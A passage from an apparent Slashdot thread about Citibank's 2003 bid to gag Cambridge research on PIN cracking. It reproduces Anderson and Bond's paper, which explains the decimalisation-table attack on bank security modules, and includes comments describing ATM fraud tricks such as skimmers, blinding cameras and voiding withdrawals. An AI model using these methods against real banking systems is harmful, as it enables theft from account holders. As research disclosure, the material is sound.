stop users manipulating the computation to get outputs useful for bad purposes. In the PIN decimalisation example above, one might try to solve the problem by blocking tables such as 1111...11. Yet an attacker can get by with scarcely more work by using two normal-looking tables that differ slightly (another kind of differential attack). We might therefore think that if we cant sanitize the inputs to the computation, perhaps we can authenticate them,
and use only those tables that real banks actually use. But building every bank in the world into our trust base is what we were trying to avoid by
using cryptography!

Conclusion

The protocol work that started off a quarter of a century ago may have seemed at the time like a minor detail within the larger project of designing robust distributed systems. Yet it has already grown into the main unifying theme of security engineering. Application-level protocols, and especially those from which an attacker can harvest data over many runs, open up new problems.
The resulting analysis techniques are set to invade the world of composable security, and the world of multiparty computation. The influence, and the consequences, of Rogers contribution just keep on growing.

References

1. NEEDHAM, R.M. AND SCHROEDER, R.M.,
Using encryption
for authentication in large networks of computers. Comm. ACM, vol.
21, no. 12, pp. 993-999, 1978.

2. BURROWS, M. ABADI, M. AND NEEDHAM, R.M.,
A
logic of authentication, ACM Transactions on Computer Systems,
vol. 8, no. 1, pp. 18-36, 1990.

Can't you just change your PIN?

[TheSync]

Won't changing your PIN from the initial one the bank assigns you avoid this problem?

Re:Can't you just change your PIN?

[Flakeloaf]

Nope. Having actually read the article in question I can assure you that won't help.

Re:Can't you just change your PIN?

No, you didn't read the article. To quote the article:

"Unskewed randomly generated PINS stored encrypted in an online database such as are already used in some banks are significantly more secure."

If you read the article, you would see that the PIN number generation had a dependency on the account number. This means that the PINs are not random. Letting customers choose their own PINs is makes the PINs essentially random, which is significantly more secure, and would not fall prey to the tactics that they describe.

Re:Can't you just change your PIN?

[Flakeloaf]

You mean I can't rely on the sanctimonious "I read the article so what you said makes you sound like an idiot" argument unless I actually *read* the article?! But there are.... lotsa pages there! I don't know all those big words!

Re:Can't you just change your PIN?

in laymans terms
nope, because the pin number is stored
as an offset value on the magnetic strip. The
original pin , or assigned pin, is a property
of the first four digits of the card number.
The original pin + the offset is the number you enter into the register

Re:in case of /.

[PhxBlue]

The hell? This isn't informative--without any sort of formatting, it's painful!

Candid Camera

[scottennis]

Don't most ATMs have cameras now that take your picture when you do a transaction?

When these "phantom transactions" occur, I assume there is a picture taken of a dark wraith in a hooded cloak.

But seriously, wouldn't the bank have your picture if you had performed a transaction?

Re:Candid Camera

[nochops]

Yes they do, and that's how I got out of a bad charge on my account.

I went to the ATM and tried to make a withdrawal. The machine tried to give me the cash, but something went wrong mechanically, and the money never came out.

I disputed the charge, but since their systems said that I did make the withdrawal, they didn't want to give me my money back.

I told them I wanted to see the surveilance tape for my personal records. Well, they didn't let me see the tape, but I'm assuming they looked at it and saw that no money came out of the machine. A few days later, i had a credit for the withdrawal.

Re:Candid Camera

[way2trivial]

Got 5$?
http://store.2600.com/spring1995.html
articles include
Facts On ATM Camera Security
basically, with a strong enough IR emitter, you can completely obfuscate the camera..

Re:Candid Camera

[TheLink]

Actually they know how much money the machine holds, and it's logged how much money the machine spits out.

The prob is if someone else gets the exact extra amount that you were short of :).

Am I missing something?

[asscroft]

How the hell do you use a pin, if you don't have the card. I'm pretty sure the ATM doesn't let me type in my card number.

Sure I could make a card, if I had the right equipment and had the card for long enough to make it, but in that case I could just as easily use the card.

I guess if I were super clever and I owned a business that used ATM's at the POS I could rig a line sniffer or something to save the ATM card info, then make some cards, then do this hack 15 times until I got the pin #, then I could steal 300.00 a day.

but if I owned a business why would I need to steal money?

Is there some easier way to use the pin #???

Re:Am I missing something?

[HughsOnFirst]

A while back there was a case where some bad guys made up a fake ATM machine along the lines of the ones you see in convenience stores. It would simply record the mag stripe on the card and capture the keystrokes, then display an error message about communication lines being down. They planted it in a mall for a week or so and captured thousands of mag stripes and PINs.

An imaginative person could come up with dozens of similar scenarios.

Re:Am I missing something?

i believe they can still use it in a debit card kinda way

Re:Am I missing something?

[Old+Wolf]

The vulnerability requires that you have access to the bank's server and can submit arbitrary function calls to it.

To hack by saving the messages -- assuming that you can intercept and you have a way to generate your own messages, not a trivial assumption -- but then you will still take the 5,000 odd guesses to get the PIN right because you do not have access to specify a decimalisation table, as is required for this attack

Re:Am I missing something?

[jjon]

Parent is plain wrong. Read the paper describing the attack (PDF). (Link courtesy of The Register.

Sure I could make a card, if I had the right equipment

Making a card is trivial - blank magstripe cards and encoders are legally and cheaply available.

and had the card for long enough to make it,

To clone a card you just need the account number, that's all that's encoded on the magstripe.

but in that case I could just as easily use the card.

No, because you wouldn't know the PIN.

I guess if I were super clever and I owned a business that used ATM's at the POS I could rig a line sniffer or something to save the ATM card info, then make some cards, then do this hack 15 times until I got the pin #

No, if the customer enters their PIN into your dodgy ATM then you just record the account number and PIN - you don't need to hack anything.

This attack can only be done by someone inside the bank with access to the PIN checking machine. These machines are meant to be protected against insider attack, but this attack gets around it. The number of guesses required is so small (~30 - if the machines were secure it should be ~5000 for a 4-digit PIN) they might not even be detected by the bank's auditing (assuming that the PIN checker has a suitable audit trail at all).

then I could steal 300.00 a day

For about one (or maybe two) days, before the bank or cardholder noticed and cancelled the card. For this to work, you need lots of PINs and just use each account once. The paper claims 20,000+ dollars per day (presumably this is based on how long it physically takes to use the ATM with several cards then move to another one before the cops arrive), and claims 2 million dollars total given a half-hour lunchbreak spent cracking PINs.

but if I owned a business why would I need to steal money?

Some people can never have enough money.

Re:Am I missing something?

[Twylite]

For about one (or maybe two) days, before the bank or cardholder noticed and cancelled the card.

To start with you're right: the attack described by the Cambridge paper requires access to a PIN verification device; ... but the attack the parent comment described was recently and successfully used in Australia.

An ATM maintenance company is suspected of sniffing magstripes and PINs and according to reports I've heard managed to remain in operation for several months (possibly longer) before being caught, by moving the equipment between ATMs on a very regular basis. The best news reference I could find on this in a short time was here.

POTS

What's POTS? The best I can come up with is "Piece of The Shit"

Re:POTS

[Lxy]

Plain Old Telephone System.

Yes, POTS is a POS.

What really happened..

[Metallic+Matty]

Citibank Tries to Hush ATM Crypto Vulnerability..

The problem was discovered in the syste-
*sounds of struggle*
Where are you throwing meeeeee...

Re:What really happened..

[LoadStar]

We apologise for the fault in the last post. Those responsible have been sacked.

Re:What really happened..

I trust they will not be needing their... final salary?

They don't need to in many cases.

[rnicey]

What goes across the line is mostly a hash of the pin and some data stored on the card. That's why ATM transactions can only typically occur with card present. I believe this vunerability is based on a weak hash algorithm or something in that region that allows you to derive the original pin much quicker than the 5000 or so guess normally required.

Therefore you'd also need to steal the physical card and make a dupe, so I'm not sure of the potential loss here. Other places where pins are asked for such as online banking may be vunerable however.

I'm probably missing something here, but I'm fairly sure from the Visa transaction specs I've got sitting here you need data from the card and the pin to initiate a transaction. Could be wrong :)

Re:They don't need to in many cases.

[KernelHappy]

The parent post is mostly correct except that there are a few satelite based ATM's. IIRC military credit union(s) use them for ATM's deployed on large warships or remote bases. But most ATM's are leased line and/or terminated to a frame relay cloud somewhere. ATM's ustilizing POTS are a more recent development (mid 90's) and are generally reserved for low traffic volume locations such as convenience stores and boobie bars. But the advent of the ATM surcharge has vaulted the number of POTS based ATM's to new heights. What goes across the line is considerably more than a hash of the pin and some data stored on the card. There is information such as the type of transaction, ther terminal ID of the machine it's coming from, transaction sequence number, etc. A copy of the data stored on the mag stripe is also usually sent in the transaction request. This additional information is necessary for reconciliation of funds as well as tracking customer problems.

Unfortunately a large portion of the security in the debit processing industry is by obscurity, minimizing theft incident values and by keeping the system sealed. In order to exploit these networks a user on the inside is usually necessary and the process of exploitation will leave that persons "fingerprints" all over the theft. Without a person on the inside the actual amounts a person could steal are rather small (thank the theives the next time you need $500 from your ATM card and your bank only allows you to withdraw $400 a day).

The biggest problem is that the debit industry relies on legacy systems. Trying to retrofit the authorization process to use newer technologies is both difficult and extremely expensive and would require industry wide cooperation.

Re:They don't need to in many cases.

[Zendar]

Therefore you'd also need to steal the physical card and make a dupe, so I'm not sure of the potential loss here. Other places where pins are asked for such as online banking may be vunerable however.

What was that movie where the kids figured out how to get the debit card pins from a distance (using some sort of listening device) and then made phoney cards to withdrawl from people's accounts?

Re:They don't need to in many cases.

[Old+Wolf]

The vulnerability applies to programmers who have direct access to the database where the PINs are stored. It tells how they can be clever in supplying parameters to the PIN verification API to deduce the correct PIN quickly.

Re:They don't need to in many cases.

[Thu+Anon+Coward]

what's even worse is that some of the ATM's are now run on a TCP/IP network. consider that thought for a few seconds and then say "ooohhhh shiiiitt !!!!!"

Was on kuro5hin earlier...

[Skim123]

perhaps that's where you saw it.

Liability, Phantoms, and Security.

[nweaver]

One major difference between the US and UK is the liability on phantom and fradulent transactions. In the US, the bank has to prove you performed the transaction. In the UK, you have to prove that you did NOT perform the transaction.

This difference in liability results in vastly different response to vulnerabilities. In the US, a vulnerability like this is taken very seriously, and phantom transactions are tracked down as they cost the bank money. In the UK, since it is the customer left holding the bag, the banks just don't care until they are sued, and, when sued, will deny deny deny.

This is a classic example of Citibank trying to cover up a problem, because it allows the customer, in court, to prove that the problem is Citibank's.

Re:Liability, Phantoms, and Security.

[fermion]

The level of proof a bank needs to win is not all that great. In my one experience, the bank went through an interrogation script with a member of family until that member said something that would open up the possibility that the bank was not liable. It was explianed that this possibility meant the bank was not responsible.

Yes, if the case was taken to court the money could be retrieved, but most of time such action is not justified.

The actual significance of the alleged secrurity problem is that it opens up expensive and potentially lucrative litigation, which brings in the lawyers and class action lawsuits, which can actually change the alleged irresponsible behaviour. Citibank wants this problem hidden so the lawyers can't use it, and they will not have to change expensive equipment.

Sucker

I hope it happens to you again in 6 months. I hope that you make the same decision, and gradually get nickle and dimed into subsidizing Wells Fargo enough so that they can cut fees to people like me.

Judd vs. Citibank

[SirWhoopass]

This is the best that I could find:

http://www.ftp.cl.cam.ac.uk/ftp/users/rja14/liabil ity.pdf

From the linked PDF:

The US is totally different; there, in the landmark court case Judd v Citibank
[JC], Dorothy Judd claimed that she had not made a number of ATM with-
drawals which Citibank had debited to her account; Citibank claimed that she
must have done. The judge ruled that Citibank was wrong in law to claim that
its systems were infallible, as this placed `an unmeetable burden of proof' on
the plaintif. Since then, if a US bank customer disputes an electronic debit, the
bank must refund the money within 30 days, unless it can prove that the claim
is an attempted fraud.

Basically, it says that the bank has the burden of proof in the United States, because the court decided it was unreasonable to have the customer "prove" a flaw within the bank's systems. The UK, however, is different. The customer has the burden of proof.

I just had a thought. . .

[Rojo^]

The vulnerabilities came to light during a court case involving 'phantom' ATM transactions that users deny making but that banks still charge to customers accounts because they claim their systems are secure."

What the fuck are there video cameras embedded in ATMs for? When do they turn on? Have my efforts to moon the bank people been completely in vain?

Re:I just had a thought. . .

[namespan]

What the fuck are there video cameras embedded in ATMs for? When do they turn on? Have my efforts to moon the bank people been completely in vain?

I just had a thought, too: reality television! A show made up from ATM video cameras!

Re:I just had a thought. . .

[jafiwam]

They are always on. There must be a loop of tape or RAM or something. They used ATM cameras in the Sniper case in the US recently, as well as several of the "Forensic Evidence" TV shows on Discovery Channel. At the time there was no transaction taking place yet the recording was done.

More than likely your buttcheeks got taped over when nothing significant happened. You'd have to moon the camera and then report a crime for anybody to see it.

This reminds my that my old room-mate used to write "blowjobs" or "dildos" on the memo line of all his checks. The bank eventually wrote a letter asking him to stop, as it caused too much laugher and disruption at the processing area.

many have 2

[Unknown+Poltroon]

one right there to take your picture of the transaction, and one farther away, so they can see you when you cover it with a post it.

New ad campaign!

[Tackhead]

> If Citibank sez that their systems are secure. Tell 'em to prove it.

I sense a new ad campaign in the offing.

You are not your per-card withdrawal limit.
You know things more important than your PIN.
You are worth more than your bank balance.

Live richly.
Citi.

welcome my son....

to the machine

Article got /.ed. Text of the article below:

[JRHelgeson]

Protocol Analysis, Composability and Computation

Updated 20 February 2003

18 February 2003

To: ukcrypto@chiark.greenend.org.uk
Subject: Citibank tries to gag crypto bug disclosure
Date: Thu, 20 Feb 2003 09:57:34 +0000
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>

Citibank is trying to get an order in the High Court today gagging public disclosure of crypto vulnerabilities:

http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_g ag.pdf

I have written to the judge opposing the order:

http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_r esponse.pdf

The background is that my student Mike Bond has discovered some really horrendous vulnerabilities in the cryptographic equipment commonly used to protect the PINs used to identify customers to cash machines:

http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560 .pdf

These vulnerabilities mean that bank insiders can almost trivially find out the PINs of any or all customers. The discoveries happened while Mike and I were working as expert witnesses on a `phantom withdrawal' case.

The vulnerabilities are also scientifically interesting:

http://cryptome.org/pacc.htm

For the last couple of years or so there has been a rising tide of phantoms. I get emails with increasing frequency from people all over the world whose banks have debited them for ATM withdrawals that they deny making. Banks in many countries simply claim that their systems are secure and so the customers must be responsible. It now looks like some of these vulnerabilities have also been discovered by the bad guys. Our courts and regulators should make the banks fix their systems, rather than just lying about security and dumping the costs on the customers.

Curiously enough, Citi was also the bank in the case that set US law on phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's an omen, if not a precedent ...

_____
Abstract

We present an attack on hardware security modules used by retail banks for the secure storage and verification of customer PINs in ATM (cash machine) infrastructures. By using adaptive decimalisation tables and guesses, the maximum amount of information is learnt about the true PIN upon each guess. It takes an average of 15 guesses to determine a four digit PIN using this technique, instead of the 5000 guesses intended. In a single 30 minute lunch-break, an attacker can thus discover approximately 7000 PINs rather than 24 with the brute force method. With a $300 withdrawal limit per card, the potential bounty is raised from $7200 to $2.1 million and a single motivated attacker could withdraw $30{50 thousand of this each day. This attack thus presents a serious threat to bank security.

-- Mike Bond and Piotr Zielinski

Decimalisation table attacks for PIN cracking

February 2003

-----

From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
To: ukcrypto@chiark.greenend.org.uk
Subject: Yet another failure of commercial cryptographic equipment
Date: Tue, 18 Feb 2003 17:52:13 +0000

I gave a talk at Cambridge yesterday in which I described a new and interesting family of attacks on cryptographic equipment. These attacks defeat machines such as the Racal RG7000 and the IBM 4758/CCA which are commonly used to protect the PINs and keys used in automatic teller machines.

The paper is available online at:

http://research.microsoft.com/~aherbert/volume63.p df [4.8MB] (link appears to be broken)

as pages 27-30 in the PDF. [HTML below]

I got a fax yesterday informing me that an application is to be brought in the High Court, it seems by Citibank, on Thursday 20th February for `relief in relation to the protection of information which they accept as being confidential and which ought not to be in the public domain.'

I hope that no English court would go so far as to censor already published material. However, one just can't tell these days ...

Protocol Analysis, Composability and Computation

Ross Anderson, Michael Bond
University of Cambridge, England

Security protocols early days

The study of security protocols has been associated with Roger Needham since 1978, when he published the seminal paper on the subject with Mike Schroeder [1]. The problem they investigated was how to distribute cryptographic keys in a network of computers. One solution is to have an authentication service with which all the principals share a key; then if Alice wants to chat with Bob (for example) she can call the service and get two encrypted messages containing the same session key one encrypted under the key she shares with the service so she can read it, and one encrypted under the key Bob shares with the service so Bob can read it. She can now send the second of these to Bob to establish secure communication. The mechanism that Needham and Schroeder designed for this evolved into Kerberos, which is now part of Windows and is probably the most widely used of all authentication protocols.

Security protocols are now embedded in a great many applications, but it is common to find unexpected bugs in them. For example, many banks used to encrypt each customers PIN using a key known to their ATMs and write it on the ATM card magnetic strip. The idea was to provide a limited service when the network was down. Years later, a villain discovered that the account number and the encrypted PIN were not linked: he could make up a bank card with his own encrypted PIN but someone elses account number, and loot their account. He went on to steal a lot of money, and once in prison wrote a manual telling everyone else how to do it too. The banks had to spend millions on changing their systems.

Clarifying the assumptions

Researchers started to gnaw away at the protocols described in the literature and found fault with essentially all of them. The failure to bind protocol elements was one frequent problem; another was that old messages could be replayed. In the case of the original Needham-Schroeder protocol, for example, the freshness of the key generated by the server was guaranteed to only one of the principals. This was not necessarily an attack, as its inventors only claimed to protect honest insiders from dishonest outsiders. However, it led to a debate about the assumptions underlying security protocol design. Do we protect only against outsiders, or against insiders? Against the malicious, or the merely careless? For example, if we use timestamps to guarantee protocol freshness, are we vulnerable to principals who carelessly let their clocks run slow? Do we only consider an attacker to have won if he can impersonate an authorised principal, or do we need to stop people abusing the protocol mechanisms to perform a service denial attack?

The early attacks led to a second seminal paper, which Roger wrote with Mike Burrows and Martin Abadi in 1989 [2], and which introduced a logic of authentication. This enables an analyst to formalise the assumptions and goals of a security protocol, and to attempt to prove its correctness. When a proof cannot be found, the place at which one gets stuck often shows where an attack can be mounted. This style of analysis turned out to be very powerful, and a large literature quickly developed in which the BAN Logic and other formal tools were developed and extended to tackle a range of problems in protocol design.

One of the remarkable things about the study of security protocols is that they have not become a solved problem. One might think that managing the objects associated with authenticating users over a network passwords, keys and the like was a fairly compact problem which would have been done to death within a few years. However, the more we dig, the more we find.

Since 1992, Roger has hosted a protocols workshop every Easter. Early events dwelled on matters of authentication and logic, but by the mid-90s, the growing interest in electronic commerce was yielding papers on mechanisms for micropayments, bets, streaming media, mobile communications and electronic voting. Later years brought work on PKI, trust management and copyright enforcement. More and more problems come along as more and more businesses reinvent themselves online; threat models have also become more realistic, with dishonest insiders displacing the mythical evil hacker on the Internet.

Dishonest insiders, and the composition problem

Over the last two years, we have been exploring exactly how one might re-engineer cryptography to cope with dishonest insiders. One conclusion is that the analysis of security protocols must be extended to application programming interfaces. This is because the crypto keys used in authentication and payment protocols are often kept in separate hardware security processors, or at least in cryptographic libraries, to which access can be restricted using physical or logical mechanisms. However, an interface has to be exposed to the application program, which will occasionally be suborned whether by a corrupt insider, or by malware. How much harm can be done, and how can we limit it?

Protecting protocols was hard enough, and yet the typical protocol consists of 35 messages exposed to manipulation. The API of a modern crypto library or hardware cryptoprocessor may contain 30500 callable functions, many with a range of options. This provides a very rich and complex environment for mischief.

Attacks often involve using two separate mechanisms provided by the cryptoprocessor for different purposes, each of which could be innocuous by itself but which combine to cause trouble. For example, it is common to compute a customer PIN by encrypting the account number with a PIN derivation key: the cryptoprocessor then returns the PIN encrypted with a PIN storage key, so that the application has no access to its clear value. So far, so good. Then there is another transaction that can be used to encrypt a communications key under the terminal key loaded in an ATM. Here things start to go wrong, as the cryptoprocessor does not distinguish between a terminal key and a PIN derivation key; it considers them both to be of the same type. The upshot is that an attacker can supply the device with an account number, claiming that it is a communications key, and ask for it to be encrypted under the PIN derivation key.

Attacks like this extend protocol analysis all the way to the composition problem the problem that connecting two systems that are secure in isolation can give a composite system that leaks. This had previously been seen as a separate issue, tackled with different conceptual tools.

Differential protocol analysis

We are now working on the second generation of API attacks, which exploit the application syntax supported by the cryptographic service. These attacks are even more powerful, and at least as interesting from the scientific point of view. PIN generation provides a neat example here too. In more detail, the standard PIN computation involves writing the result of the encryption as a hex string and decimalising it. As some banks like to let customers change their PIN to a more memorable number, there is a provision to add an offset to give the PIN that the customer actually enters: Account number: 8807 0123 4569 1715 PIN derivation key: FEFE FEFE FEFE FEFE Encrypted account number: A2CE 126C 69AE C82D Natural (decimalised) PIN: 0224 Offset: 6565 Customer PIN: 6789

The typical implementation requires the programmer to send the cryptoprocessor the account number, a table describing the decimalisation (here, 0123 4567 8901 2345) and the offset. The processor returns the PIN, encrypted under the PIN storage key. The designers do not seem to have realised that a crooked programmer can manipulate the decimalisation table and the offset as well as the account number. A multitude of attacks follow. For example, one can send in an account number with a decimalisation table of 1111...11 to find out the ciphertext corresponding to a clear PIN of 1111, and then with a decimalisation table of 0111...11 to see if there is a zero in the first four digits of the encrypted account number (if so, the PIN, and thus the ciphertext output, will be different). By manipulating the decimalisation table further, he can get all the digits in the PIN, and by then playing with the offset he can get their order. In total, the attack requires only 1525 unprivileged cryptoprocessor transactions to discover the PIN on a single target account.

This second type of attack takes protocol analysis into yet another realm: that of differential attacks. Over the last ten years, a number of techniques have been invented for attacking cryptographic systems by bombarding them with inputs with chosen differences.

For example, in differential cryptanalysis, one analyses the changes in the output of the encryption algorithm; while with differential power analysis, one measures changes in the current consumption or electromagnetic emissions of the equipment. Now we have examples of how consecutive runs of a protocol can leak information if the inputs are suitably chosen. The resulting differential protocol analysis appears to be very powerful against application-level crypto.

It will take us some time to figure out the general lessons to be drawn from attacks like this, the robustness principles that designers should use to avoid them, and the analysis techniques that might assure us of a particular designs soundness. The randomisation of all protocols (another feature of Rogers work) is likely to be important.

Quantitative analysis and multiparty computation

Various researchers have speculated about whether there might one day be a quantitative analysis of protocol security. This might be feasible for PIN processing applications as we can measure the information leakage per transaction in terms of the reduction of entropy in the unknown PIN. This leads in turn to a possible real-world application of an attack previously considered theoretical.

Gus Simmons wrote extensively on covert channels in protocols. One such channel that is always present is the balking channel when one of the principals in a protocol signals something by halting and refusing to continue. This is normally considered unimportant as its information capacity is only a third of a bit per transaction. But with systems designed to cope with large transaction volumes, this need no longer hold. For example, a Trojanned cryptoprocessor could balk when it sees a predetermined PIN. If the PIN length were eight digits, this would be unlikely to hinder normal operation, but at a thousand transactions a second, a programmer could quickly find a number in a typical nine-digit account number range with just this PIN, and open an account for it. Once this kind of problem is appreciated, one can start to look for attacks that involve inducing rare error conditions that cause the cryptoprocessor to abort a transaction. (They exist.)

A third emerging link is between protocol analysis and secure multiparty computation. In application-level crypto we may have several inputs to a computation, some of them coming from an untrusted source, and we have to stop users manipulating the computation to get outputs useful for bad purposes. In the PIN decimalisation example above, one might try to solve the problem by blocking tables such as 1111...11. Yet an attacker can get by with scarcely more work by using two normal-looking tables that differ slightly (another kind of differential attack). We might therefore think that if we cant sanitize the inputs to the computation, perhaps we can authenticate them, and use only those tables that real banks actually use. But building every bank in the world into our trust base is what we were trying to avoid by using cryptography!

Conclusion

The protocol work that started off a quarter of a century ago may have seemed at the time like a minor detail within the larger project of designing robust distributed systems. Yet it has already grown into the main unifying theme of security engineering. Application-level protocols, and especially those from which an attacker can harvest data over many runs, open up new problems. The resulting analysis techniques are set to invade the world of composable security, and the world of multiparty computation. The influence, and the consequences, of Rogers contribution just keep on growing.

References

1. NEEDHAM, R.M. AND SCHROEDER, R.M., Using encryption for authentication in large networks of computers. Comm. ACM, vol. 21, no. 12, pp. 993-999, 1978.

2. BURROWS, M. ABADI, M. AND NEEDHAM, R.M., A logic of authentication, ACM Transactions on Computer Systems, vol. 8, no. 1, pp. 18-36, 1990.

In other news

Lunatics rally in Washington to allow nuclear launch codes posted on slashdot.org.

Re:In other news

Where do I sign up ? I'm launching mine at the French, I'll do Sadaam next.

This makes me laugh

I'm doing a late night coding session, and reading slashdot at the same time.

My project? A windows 2000 based ATM machine.

If only your people *really* knew the truth... :o)

Re:ATM? (pic)!

[$$$$$exyGal]

ATM with Windows

--sex

No, they wont.

[Unknown+Poltroon]

WHy would they fis it, when they already KNOW theres a problem, and yet they refuse to admit it to the customers who have lost money??!?! If they were quietly REIMBURSING the customers, then i would agree. But they arent.

Too late..

[xchino]

I just downloaded the pdf. I'm sure thousands of others have as well. If they manage to get a BS gag order, I'll happily send my archived copy to a web server outside the US.

It's a ridiculous scam, and if it works, that simply reflects the propensity of lack of true patriotism among those in charge.

Re:Too late..

[harryk]

which PDF did you download? I got 2 of the 4 (I think) could you send me the one you have? harryk

Re:Too late..

Put it up on a server outside the U.S. *before* the gag order is issued. That way, you cannot be touched for ignoring the order.

Re:Wouldn't have happened....

This, to me, actually means, noone cares about OS2 enough to hack it. There isn't an OS that can't be busted. There are creative/genius people out there.

The absence of an action does not make such action impossible. To think otherwise is very ego-maniacal.

Re:My Days in the Show

"air rage" is so pre-9/11.

SUBMIT is what's cool now.

The interesting question . . .

[Badgerman]

Now that this information has been posted here and on various news sites, will this pressure Citibank to fix their problem - or open up new lawsuits and claims that such postings helped/caused crimes . . .

In an age of Information Technology, the medium, the message, and the misuse can be the same thing.

Re:ATM? (pic)!

[Dr+Caleb]

Good one! The server is running Windows too.

The page cannot be displayed
There are too many people accessing the Web site at this time.

Please try the following:

* Click the Refresh button, or try again later.
* Open the www.maximum-digital.com home page, and then look for links to the information you want.

HTTP 403.9 - Access Forbidden: Too many users are connected

Internet Information Services

Re:in case of /.

Yeah, we all know how that story ends: three crappy sequels, each one desecrating a little bit more what little of that was good in our youth, where it turns out that Trollvader is the hero!

An old vulnerability

[frovingslosh]

This seems the right time and place to relate a story about a 30 year old ATM bug I heard about:

A student at my old school noticed once that the ATM machine had a problem and so voided the transaction he was making. He also noted that the ATM gave him his money before it gave the ATM card back.

He went up to an ATM one evening and slipped in his card. Pushed all the righ buttons to take out his daily limit. Took the cash. The ATM asked if he wanted to do anything else, he said no. As the ATM was about to eject his card, he put his hand in front of the slot. The ATM displayed that there was a jam. It voided the transaction and displayed that it was unavailable. He removed his hand and was able to grab the card by it's edge and pull it out. The ATM sensed the jam was cleared and displayed it was ready for business.

The procedure was repeated. and repeated. and repeated. Eventually the ATM was empty.

The next day he went into the bank, put down a pile of cash and explained to the manager that they had a problem.

Re:An old vulnerability

[blair1q]

When does he get out of prison?

Re:An old vulnerability

[pod]

I seriously doubt it would have worked even back then. The bank usually knows exactly how much money is in the machine, so when it's refilled or audited the discreptancy would show up and transaction records would be pulled.

Sure you get the money, but then you screw up your life for a measly few grand. It's not worth it if you just wanna scam some retirement money.

Re:An old vulnerability

[Zog+The+Undeniable]

Every ATM I've ever used makes you take your card BEFORE the cash. I smell an urban myth ;-)

Re:An old vulnerability

[Spirilis]

umm, every one I've ever been to that TAKES your card (as opposed to swiping it across a reader) asks you if you want to do another transaction, before releasing your card... giving you the cash before it asks. Then again, that kind of vulnerability may not work, since the cash withdrawal transaction had finished...

Re:An old vulnerability

[frovingslosh]

I made it pretty clear that this was from the 70's. Once it was discovered, there was a national shutdown of the ATMs affected and a very hasty rework of the software. Yes, I observed that change after the event. Just because you don't see the problem now is hardly a reason to call it an urban myth.

And for the other post that such a scam would mess up your entire life, banks are pretty easy about accepting your money and letting you open an account, even more so back then. I've been asked for ID to get money from a bank, but never to give them money. It would have not been hard back then, before there were cameras in all of the ATMs and other precautions, to open an account, get an ATM card sent to a Post Office Box, and empty a town full of ATM's in one night, with little left behind to be found from. They are damn lucky the guy who figured it out was not so inclined.

Re:An old vulnerability

[Zog+The+Undeniable]

AFAIK the prime reason the card is returned before the cash is to stop people walking away and forgetting their card (it's amazing how the brain shuts down at the feel of hard currency). I don't have any stats on me, but "time outs" are one of the main reasons for captured cards.

Embarrassingly, I've done it myself twice when carrying out other transactions that don't require you to take the card before completion (such as statements and deposits). Luckily I work for the bank, so they don't cut my card in half :-)

Re:An old vulnerability

[Rob+Parkhill]

Another classic:

Stick in card, punch in digits to withdraw a few hundred dollars. When the money is spit out, carefully take the middle bills, leaving the top and bottom ones (often different demoninations). Wait. ATM will pull the cash back in, thinking you walked away and forgot to take it. Your account is credited for the full amount.

No, this doesn't work anymore!

Re:An old vulnerability

[weblogger]

Here in Portugal at least if the person didn't pick up the card into a few seconds as like the money the machine take it back. If transaction (the money) was already taken and not repicked by the machine then the account is debited, eaven if person didn't take the card the account still in debit for the movement.

A bit of background

[tarquin_fim_bim]

To the court case is at the Inququirer

Re:My Days in the Show

Hats off to you, sir! Light up a stogie and lean back and enjoy the good life and all the fruits concommitent thereto.

YOU HAVE ARRIVED.

Why bother doing a cryptographic attack

when you can steal the whole machine?

(As far as I know, they still haven't caught all the guys responsible for these.)

Posting Anon

Not too long ago, I was a building inspector. One of the main types of buildings that I inspected were FUNB (First Union National Banks) and got to see the inside of how things were run.

*Every single ATM* machine I saw in use (that would be hundreds) were simply p166s with IBM OS/2 attached. That's it, nothing fancy, nothing sneaky, justa plain PC. After watching how they were updated and the "security" on them, I no longer use ATM machines, and advise those I care about not to either.

Everything Is Under Control

[antiprime]

Scary, huh? Kinda makes you think, doesn't it?

Ouch, that hurts. Well, let's go shopping.

All your revolution are been co-opted!

[Thud457]

Taylor Durden now works at CitiBank's ad agency?

I guess he can be more effective in that position than slumming as a projectionist!

How clever! Reverse karma whore.

[Mothra+the+III]

It the great /. tradition of saying something fast rather than saying it properly. Nice work!

Gag this

This research is now posted publically on my University's web site (univ. of colorado). have a nice day, Citidorks.

huh?

do they really think anybody that would do this kind of froud would really have any trouble getting this info even if it was "gagged"?

My experience with ATM cameras...

[bearl]

So here's my ATM camera story...

In 1983, my first job out of college was as an internal auditor at a small regional bank that had only seven branches. We were just installing ATMs and most of our customers were elderly types who weren't interested in these new fangled computers. I, being young and more enlightened, loved them, used them all the time, and rarely carried much cash at all, preferring to just stop by a convenient ATM for a fresh withdrawal. This was in the days when banks considered ATMs as a money saver because customers would use the ATM rather than coming inside to bother a teller, thus saving the bank loads of money by reducing the number of tellers they had to employ, so there were no fees. But I digress...

One of our older patrons had his ATM card misappropriated by a handyman, family member, or other close associate, and said villian used the card to make several large withdrawals. The customer reported the problem, we told the system to capture the card on the next use, and waited.

Within a week, the card was used, and captured. The film from the camera was sent off (these days it's probably digital). The ATM company found that either our tellers had been ordering the wrong kind of film for our ATMs, or they had been sending us the wrong kind, or the tellers where installing it wrong, or something. They sent a note with that info to our President, explaining that the photo was probably the wrong person and wouldn't hold up in court, along with the developed photograph.

Fortunately he read the note before he looked at the photograph, because the guy in the photo was me! He came into my office and with as serious an expression as he could manage, told me they had the photo back, and had their man (I didn't know about the problem with the film at this point). He slid open the envelope, and there in stark black and white was me, probably on a Saturday morning, unshaven and in a dirty Ramones t-shirt.

I stuttered for a few seconds but he couldn't hold it together and started laughing. Needless to say that photo appeared all over the bank for the next several years, along with signs like "Have you seen this man?" and "Do not serve - notify security." We figured that since I used the ATM so much, I was probably on 85% of the photos on the film. The odds were pretty good that with the indexes being wrong I would come up, but it couldn't have been a worse photograph.

Oh, eventually the real crook was caught because he came into the bank to complain that the ATM had taken "his" card and the replacement hadn't arrived yet.

Re:My experience with ATM cameras...

Love ur story :-) But who was the crook?

Damn.

[airrage]

This was supposed to be an homage to becoming a moderator, and yet in hindsight, giving that it's a first post, and there is some thinly-veiled sexual references, I can honestly see how this was not well received.

~Airrage.

Choose your own PIN

[IanBevan]

